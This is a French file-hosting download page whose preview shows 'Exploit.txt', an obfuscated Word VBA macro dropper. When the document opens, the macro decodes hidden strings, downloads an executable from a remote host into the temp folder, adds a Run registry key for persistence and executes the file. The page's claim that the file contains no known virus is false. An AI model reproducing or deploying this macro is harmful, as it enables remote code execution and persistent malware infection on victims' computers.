Hébergeur de fichiers indépendant

Exploit.txt

À propos

Type de fichier
Fichier TXT de 3 Ko (text/plain)
Confidentialité
Fichier public, envoyé le 16 juillet 2015 à 22:26, depuis l'adresse IP 149.88.x.x (IL)
Sécurité
Ne contient aucun Virus ou Malware connus - Dernière vérification: 18 heures
Statistiques
La présente page de téléchargement a été vue 311 fois depuis l'envoi du fichier
Page de téléchargement

Aperçu du fichier


'Macro Name: zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP
Private Declare PtrSafe Function pbCYXzhykoOpAuMJgCbSObr Lib "shell32.dll" Alias "ShellExecuteA" (ByVal giCfkxudqPPrAMoInLeDepjBk As Long, ByVal HrBHDPgvCENlgJLsyRZOuqqCHszGWyxNDFxWzecKyTJAOYHH As String, ByVal uuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtY As String, ByVal TUSXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBX As String, ByVal wCyJNcxyIRMqGYtMGwcllj As String, ByVal oZSZEQQgknfDSLvdgAdhv As Long) As Long
Private Declare PtrSafe Function kjzpskImQOwlFwmAKttghHQdFYDcuGurlDAXHRXT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal gwxSUeBjMcIOiqgLGGFKvo As Long, ByVal vZAmCFIAYChQMBVMDQbJJxjK As String, ByVal htHpGswWKHCTRoJiokwzNkluEzdsKfysiNWXVbLELqDCS As String, ByVal VYQqExiPRmOThrMZNzbxwXFWIMnNYSliEZzrnyPf As Long, ByVal AoxUPtvcvBJyenomrOUcGTSjnphGVNy As Long) As Long
Dim KjdGIpJOWMsBBAEcjqUhhxADvTjc As String, LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID As String, ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF As String, vfbPkZQfpXXKxXuHVDUGKkYVPifBXwCyJNc As String, xyIRMqGYtMGwclljoZSZEQQgknfDSLv As String, dgAdhvFbobNpKJmTlWbAbmgyvSoME As String, ZEQQgknfDSLvdgAdhvFbo As String, bNpKJmTlWbAbmgyvSoMEBMesNBKjdGIpJOWMsBBAEcj As String
Private Function BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf)
    Dim ndIDECHszGWyxNDFxWzec, KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU, SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw
y = Len(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf)
For x = y To 1 Step -1
     qUhhxADvTjcLtwQtxLIrEeeFNZCVBZrQrCwOyUEPURd = Mid(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf, x, 1)
     uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu = uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu & qUhhxADvTjcLtwQtxLIrEeeFNZCVBZrQrCwOyUEPURd
Next
 For KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU = 1 To Len(uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu)
        ndIDECHszGWyxNDFxWzec = Mid(uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu, KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU, 1)
        SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw = SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw & Chr(Asc(ndIDECHszGWyxNDFxWzec) - 1)
    Next
    BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx = SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw
End Function
Private Sub zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP()
LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID = BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx("fyf/jw")
ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF = Environ$("tmp") & "\" & LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID
KjdGIpJOWMsBBAEcjqUhhxADvTjc = BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx("fyf/fjqpD13&.13&ljjlp017e16decdee5g1:ed5fd:f:b151e4945ge21435909Uk8L8g680ebpmoxpe0ufo/utpihs00;quui")
kjzpskImQOwlFwmAKttghHQdFYDcuGurlDAXHRXT 0, KjdGIpJOWMsBBAEcjqUhhxADvTjc, ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF, 0, 0
Dim Reg As Object
Set Reg = CreateObject("Wscript.shell")
Reg.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & "vi.exe", b
pbCYXzhykoOpAuMJgCbSObr 0, "open", b, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
Dim MyText As String
MyText = "bojouhf"
Selection.TypeText (MyText)
zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP
End Sub


Partager le fichier

Télécharger Exploit.txt

Télécharger le fichier (3 Ko)